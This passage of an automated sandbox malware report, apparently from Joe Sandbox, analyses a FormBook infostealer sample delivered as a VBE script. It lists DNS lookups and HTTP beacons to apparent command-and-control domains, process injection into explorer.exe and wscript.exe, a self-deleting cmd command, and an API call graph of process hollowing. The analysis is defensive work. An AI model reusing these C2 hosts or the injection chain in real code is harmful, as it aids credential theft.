                                          Jul 26, 2024 13:05:49.773336887 CEST1.1.1.1192.168.2.50x5f92No error (0)www.especialistaleitura.onlineespecialistaleitura.onlineCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:05:49.773336887 CEST1.1.1.1192.168.2.50x5f92No error (0)especialistaleitura.online195.35.41.249A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:10.163721085 CEST1.1.1.1192.168.2.50x87deNo error (0)www.rtproketslotcsn.artrtproketslotcsn.artCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:06:10.163721085 CEST1.1.1.1192.168.2.50x87deNo error (0)rtproketslotcsn.art67.223.118.63A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:30.595186949 CEST1.1.1.1192.168.2.50x8497No error (0)www.exploringtheoutdoors.nethost.websitepro.hostingCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:06:30.595186949 CEST1.1.1.1192.168.2.50x8497No error (0)host.websitepro.hosting34.149.86.124A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:51.010611057 CEST1.1.1.1192.168.2.50xc4c3No error (0)www.invigoratewell.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 26, 2024 13:06:51.010611057 CEST1.1.1.1192.168.2.50xc4c3No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:51.010611057 CEST1.1.1.1192.168.2.50xc4c3No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:51.010611057 CEST1.1.1.1192.168.2.50xc4c3No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:06:51.010611057 CEST1.1.1.1192.168.2.50xc4c3No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:07:12.005621910 CEST1.1.1.1192.168.2.50x611eServer failure (2)www.legalix.xyznonenoneA (IP address)IN (0x0001)false
                                          Jul 26, 2024 13:07:32.465130091 CEST1.1.1.1192.168.2.50xbb21No error (0)www.21stcut.shop103.224.182.210A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.tateshades.xyz
                                          • www.gyosei-arimura.com
                                          • www.ashleymorgan.live
                                          • www.rendamaisbr.com
                                          • www.especialistaleitura.online

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549716198.54.117.242801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 13:03:47.733885050 CEST160OUTGET /de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn HTTP/1.1
                                          Host: www.tateshades.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549718103.169.142.0801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 13:04:08.235335112 CEST164OUTGET /de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx HTTP/1.1
                                          Host: www.gyosei-arimura.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 26, 2024 13:04:08.740252972 CEST765INHTTP/1.1 301 Moved Permanently
                                          Date: Fri, 26 Jul 2024 11:04:08 GMT
                                          Content-Type: text/html
                                          Content-Length: 167
                                          Connection: close
                                          Cache-Control: max-age=3600
                                          Expires: Fri, 26 Jul 2024 12:04:08 GMT
                                          Location: https://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx
                                          expect-ct: max-age=86400, enforce
                                          x-content-type-options: nosniff
                                          x-frame-options: SAMEORIGIN
                                          x-xss-protection: 1; mode=block
                                          referrer-policy: strict-origin-when-cross-origin
                                          Server: cloudflare
                                          CF-RAY: 8a93e83e3c204362-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.54971979.133.41.250801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 13:04:29.481951952 CEST163OUTGET /de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 HTTP/1.1
                                          Host: www.ashleymorgan.live
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549720104.21.29.136801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 13:05:29.496283054 CEST161OUTGET /de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx HTTP/1.1
                                          Host: www.rendamaisbr.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 26, 2024 13:05:29.983182907 CEST734INHTTP/1.1 404 Not Found
                                          Date: Fri, 26 Jul 2024 11:05:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAbLK1QdlRV6LTBnBQHP4GMtosATTCpVjiz%2F%2B8enYj6c8u0AHIppOl0xFo2qiVuQVaotmCVNuMU9HCRRoMoShzJFVrl5VcK8YiriQ5ZaRymFb5cMcNjDMhOkipfaQtZ83MDb%2F%2FPM"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a93ea39e95042c0-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549721195.35.41.249801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 13:05:49.778940916 CEST172OUTGET /de94/?iH=L48pdJnx&jBZ=2R5LA04AgrrHOF4dber2AYa+4EXsdsXp9ugXIfcwTjx7QxDViEac/VVT3dt/yVkMwVF8 HTTP/1.1
                                          Host: www.especialistaleitura.online
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:07:03:01
                                          Start date:26/07/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe"
                                          Imagebase:0x7ff6c78b0000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:07:03:09
                                          Start date:26/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\HHhHh.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x320000
                                          File size:574'464 bytes
                                          MD5 hash:62FA567CBB7227AEB7755B679D780725
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:07:03:10
                                          Start date:26/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\HHhHh.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x7c0000
                                          File size:574'464 bytes
                                          MD5 hash:62FA567CBB7227AEB7755B679D780725
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:07:03:10
                                          Start date:26/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff674740000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:6
                                          Start time:07:03:13
                                          Start date:26/07/2024
                                          Path:C:\Windows\SysWOW64\wscript.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                          Imagebase:0x9b0000
                                          File size:147'456 bytes
                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:7
                                          Start time:07:03:17
                                          Start date:26/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:07:03:17
                                          Start date:26/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:8.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:210
                                            Total number of Limit Nodes:13
                                            execution_graph 24768 4b3d6b0 DuplicateHandle 24769 4b3d746 24768->24769 24770 4b3acd0 24774 4b3adb7 24770->24774 24782 4b3adc8 24770->24782 24771 4b3acdf 24775 4b3add9 24774->24775 24776 4b3adfc 24774->24776 24775->24776 24790 4b3b051 24775->24790 24794 4b3b060 24775->24794 24776->24771 24777 4b3adf4 24777->24776 24778 4b3b000 GetModuleHandleW 24777->24778 24779 4b3b02d 24778->24779 24779->24771 24783 4b3adfc 24782->24783 24784 4b3add9 24782->24784 24783->24771 24784->24783 24788 4b3b051 LoadLibraryExW 24784->24788 24789 4b3b060 LoadLibraryExW 24784->24789 24785 4b3b000 GetModuleHandleW 24787 4b3b02d 24785->24787 24786 4b3adf4 24786->24783 24786->24785 24787->24771 24788->24786 24789->24786 24791 4b3b074 24790->24791 24792 4b3b099 24791->24792 24798 4b3a150 24791->24798 24792->24777 24795 4b3b074 24794->24795 24796 4b3b099 24795->24796 24797 4b3a150 LoadLibraryExW 24795->24797 24796->24777 24797->24796 24799 4b3b240 LoadLibraryExW 24798->24799 24801 4b3b2b9 24799->24801 24801->24792 24809 4b3d060 24810 4b3d0a6 GetCurrentProcess 24809->24810 24812 4b3d0f1 24810->24812 24813 4b3d0f8 GetCurrentThread 24810->24813 24812->24813 24814 4b3d135 GetCurrentProcess 24813->24814 24815 4b3d12e 24813->24815 24816 4b3d16b 24814->24816 24815->24814 24817 4b3d193 GetCurrentThreadId 24816->24817 24818 4b3d1c4 24817->24818 24819 4b34668 24820 4b3467a 24819->24820 24821 4b34686 24820->24821 24823 4b34778 24820->24823 24824 4b3479d 24823->24824 24828 4b34879 24824->24828 24832 4b34888 24824->24832 24830 4b348af 24828->24830 24829 4b3498c 24830->24829 24836 4b344c4 24830->24836 24833 4b348af 24832->24833 24834 4b3498c 24833->24834 24835 4b344c4 CreateActCtxA 24833->24835 24835->24834 24837 4b35918 CreateActCtxA 24836->24837 24839 4b359db 24837->24839 24802 51cce70 24803 51ccffb 24802->24803 24805 51cce96 24802->24805 24805->24803 24806 51c8ef0 24805->24806 24807 51cd0f0 PostMessageW 24806->24807 24808 51cd15c 24807->24808 24808->24805 24840 51cebc0 FindCloseChangeNotification 24841 51cec27 24840->24841 24842 51cb502 24843 51cb508 24842->24843 24847 51cbc50 24843->24847 24853 51cbc41 24843->24853 24844 51cb513 24848 51cbc65 24847->24848 24859 51cbcf6 24848->24859 24875 51cbc81 24848->24875 24890 51cbc90 24848->24890 24849 51cbc77 24849->24844 24854 51cbc65 24853->24854 24856 51cbcf6 12 API calls 24854->24856 24857 51cbc90 12 API calls 24854->24857 24858 51cbc81 12 API calls 24854->24858 24855 51cbc77 24855->24844 24856->24855 24857->24855 24858->24855 24860 51cbc84 24859->24860 24862 51cbcf9 24859->24862 24861 51cbcb2 24860->24861 24905 51cc43e 24860->24905 24910 51cc1dc 24860->24910 24915 51cc5a2 24860->24915 24920 51cc185 24860->24920 24927 51cc345 24860->24927 24932 51cc564 24860->24932 24940 51cc0a9 24860->24940 24947 51cc5e9 24860->24947 24956 51cc448 24860->24956 24963 51cc4ed 24860->24963 24968 51cc395 24860->24968 24976 51cc5b4 24860->24976 24861->24849 24862->24849 24876 51cbc90 24875->24876 24877 51cbcb2 24876->24877 24878 51cc1dc 2 API calls 24876->24878 24879 51cc43e 2 API calls 24876->24879 24880 51cc5b4 2 API calls 24876->24880 24881 51cc395 4 API calls 24876->24881 24882 51cc4ed 2 API calls 24876->24882 24883 51cc448 2 API calls 24876->24883 24884 51cc5e9 2 API calls 24876->24884 24885 51cc0a9 4 API calls 24876->24885 24886 51cc564 4 API calls 24876->24886 24887 51cc345 2 API calls 24876->24887 24888 51cc185 4 API calls 24876->24888 24889 51cc5a2 2 API calls 24876->24889 24877->24849 24878->24877 24879->24877 24880->24877 24881->24877 24882->24877 24883->24877 24884->24877 24885->24877 24886->24877 24887->24877 24888->24877 24889->24877 24891 51cbcaa 24890->24891 24892 51cbcb2 24891->24892 24893 51cc1dc 2 API calls 24891->24893 24894 51cc43e 2 API calls 24891->24894 24895 51cc5b4 2 API calls 24891->24895 24896 51cc395 4 API calls 24891->24896 24897 51cc4ed 2 API calls 24891->24897 24898 51cc448 2 API calls 24891->24898 24899 51cc5e9 2 API calls 24891->24899 24900 51cc0a9 4 API calls 24891->24900 24901 51cc564 4 API calls 24891->24901 24902 51cc345 2 API calls 24891->24902 24903 51cc185 4 API calls 24891->24903 24904 51cc5a2 2 API calls 24891->24904 24892->24849 24893->24892 24894->24892 24895->24892 24896->24892 24897->24892 24898->24892 24899->24892 24900->24892 24901->24892 24902->24892 24903->24892 24904->24892 24906 51cc899 24905->24906 24981 51cce28 24906->24981 24986 51cce19 24906->24986 24907 51cc8b2 24911 51cc3fe 24910->24911 24912 51cc152 24910->24912 24911->24861 24912->24911 24999 51cab28 24912->24999 25003 51cab20 24912->25003 24916 51cc902 24915->24916 24918 51ca988 Wow64SetThreadContext 24916->24918 24919 51ca990 Wow64SetThreadContext 24916->24919 24917 51cc91d 24918->24917 24919->24917 25007 51cac18 24920->25007 25011 51cac11 24920->25011 24921 51cc3fe 24921->24861 24922 51cc152 24922->24921 24923 51cab28 WriteProcessMemory 24922->24923 24924 51cab20 WriteProcessMemory 24922->24924 24923->24922 24924->24922 24928 51cc34b 24927->24928 24930 51cab28 WriteProcessMemory 24928->24930 24931 51cab20 WriteProcessMemory 24928->24931 24929 51cc97f 24930->24929 24931->24929 24933 51cc3b3 24932->24933 24934 51cc152 24932->24934 25015 51ca8db 24933->25015 25019 51ca8e0 24933->25019 24935 51cc3fe 24934->24935 24936 51cab28 WriteProcessMemory 24934->24936 24937 51cab20 WriteProcessMemory 24934->24937 24935->24861 24936->24934 24937->24934 25023 51cadb0 24940->25023 25027 51cada5 24940->25027 24948 51cc657 24947->24948 24949 51cc5ec 24947->24949 24950 51cc152 24948->24950 24954 51cab28 WriteProcessMemory 24948->24954 24955 51cab20 WriteProcessMemory 24948->24955 24951 51cc3fe 24950->24951 24952 51cab28 WriteProcessMemory 24950->24952 24953 51cab20 WriteProcessMemory 24950->24953 24951->24861 24952->24950 24953->24950 24954->24950 24955->24950 24961 51cab28 WriteProcessMemory 24956->24961 24962 51cab20 WriteProcessMemory 24956->24962 24957 51cc152 24958 51cc3fe 24957->24958 24959 51cab28 WriteProcessMemory 24957->24959 24960 51cab20 WriteProcessMemory 24957->24960 24958->24861 24959->24957 24960->24957 24961->24957 24962->24957 24964 51cc614 24963->24964 25031 51caa68 24964->25031 25035 51caa60 24964->25035 24965 51cc632 24969 51cc3a2 24968->24969 24974 51ca8db ResumeThread 24969->24974 24975 51ca8e0 ResumeThread 24969->24975 24970 51cc3fe 24970->24861 24971 51cc152 24971->24970 24972 51cab28 WriteProcessMemory 24971->24972 24973 51cab20 WriteProcessMemory 24971->24973 24972->24971 24973->24971 24974->24971 24975->24971 24977 51cc152 24976->24977 24978 51cc3fe 24977->24978 24979 51cab28 WriteProcessMemory 24977->24979 24980 51cab20 WriteProcessMemory 24977->24980 24978->24861 24979->24977 24980->24977 24982 51cce3d 24981->24982 24991 51ca988 24982->24991 24995 51ca990 24982->24995 24983 51cce53 24983->24907 24987 51cce28 24986->24987 24989 51ca988 Wow64SetThreadContext 24987->24989 24990 51ca990 Wow64SetThreadContext 24987->24990 24988 51cce53 24988->24907 24989->24988 24990->24988 24992 51ca9d5 Wow64SetThreadContext 24991->24992 24994 51caa1d 24992->24994 24994->24983 24996 51ca9d5 Wow64SetThreadContext 24995->24996 24998 51caa1d 24996->24998 24998->24983 25000 51cab70 WriteProcessMemory 24999->25000 25002 51cabc7 25000->25002 25002->24912 25004 51cab70 WriteProcessMemory 25003->25004 25006 51cabc7 25004->25006 25006->24912 25008 51cac63 ReadProcessMemory 25007->25008 25010 51caca7 25008->25010 25010->24922 25012 51cac63 ReadProcessMemory 25011->25012 25014 51caca7 25012->25014 25014->24922 25016 51ca920 ResumeThread 25015->25016 25018 51ca951 25016->25018 25018->24934 25020 51ca920 ResumeThread 25019->25020 25022 51ca951 25020->25022 25022->24934 25024 51cae39 CreateProcessA 25023->25024 25026 51caffb 25024->25026 25026->25026 25028 51cae39 CreateProcessA 25027->25028 25030 51caffb 25028->25030 25030->25030 25032 51caaa8 VirtualAllocEx 25031->25032 25034 51caae5 25032->25034 25034->24965 25036 51caaa8 VirtualAllocEx 25035->25036 25038 51caae5 25036->25038 25038->24965

                                            Executed Functions

                                            Function 051CECD8 Relevance: .4, Instructions: 353COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a92974ae32c694e4232ebf6aeb318b64232f543760c69a3ca503d495a108493a
                                            • Instruction ID: 6fd8b8ebfde4d216c6d1c75f83caf45eb07253c157bcd487a3985dbe7e604e0d
                                            • Opcode Fuzzy Hash: a92974ae32c694e4232ebf6aeb318b64232f543760c69a3ca503d495a108493a
                                            • Instruction Fuzzy Hash: 27D1CE317012008FEB26DB76C450B6EBBFBAF89704F2445ADD146DB290DB36E902CB51
                                            Function 04B3D051 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 4b3d051-4b3d0ef GetCurrentProcess 298 4b3d0f1-4b3d0f7 294->298 299 4b3d0f8-4b3d12c GetCurrentThread 294->299 298->299 300 4b3d135-4b3d169 GetCurrentProcess 299->300 301 4b3d12e-4b3d134 299->301 303 4b3d172-4b3d18d call 4b3d638 300->303 304 4b3d16b-4b3d171 300->304 301->300 307 4b3d193-4b3d1c2 GetCurrentThreadId 303->307 304->303 308 4b3d1c4-4b3d1ca 307->308 309 4b3d1cb-4b3d22d 307->309 308->309
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D0DE
                                            • GetCurrentThread.KERNEL32 ref: 04B3D11B
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D158
                                            • GetCurrentThreadId.KERNEL32 ref: 04B3D1B1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 8cabe457c4e0562f154e14190c9b9f019e4c2022e5e645f3b4054b1a6d1c5f44
                                            • Instruction ID: 8ff0e631685eb365618de5772776aea23f776d525f54ddbf9f124c5ef1e7b492
                                            • Opcode Fuzzy Hash: 8cabe457c4e0562f154e14190c9b9f019e4c2022e5e645f3b4054b1a6d1c5f44
                                            • Instruction Fuzzy Hash: 3F5147B19007498FEB15DFAAD588BAEBBF5EF48304F208499D409A7360D738A944CF65
                                            Function 04B3D060 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 316 4b3d060-4b3d0ef GetCurrentProcess 320 4b3d0f1-4b3d0f7 316->320 321 4b3d0f8-4b3d12c GetCurrentThread 316->321 320->321 322 4b3d135-4b3d169 GetCurrentProcess 321->322 323 4b3d12e-4b3d134 321->323 325 4b3d172-4b3d18d call 4b3d638 322->325 326 4b3d16b-4b3d171 322->326 323->322 329 4b3d193-4b3d1c2 GetCurrentThreadId 325->329 326->325 330 4b3d1c4-4b3d1ca 329->330 331 4b3d1cb-4b3d22d 329->331 330->331
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D0DE
                                            • GetCurrentThread.KERNEL32 ref: 04B3D11B
                                            • GetCurrentProcess.KERNEL32 ref: 04B3D158
                                            • GetCurrentThreadId.KERNEL32 ref: 04B3D1B1
                                            Memory Dump Source
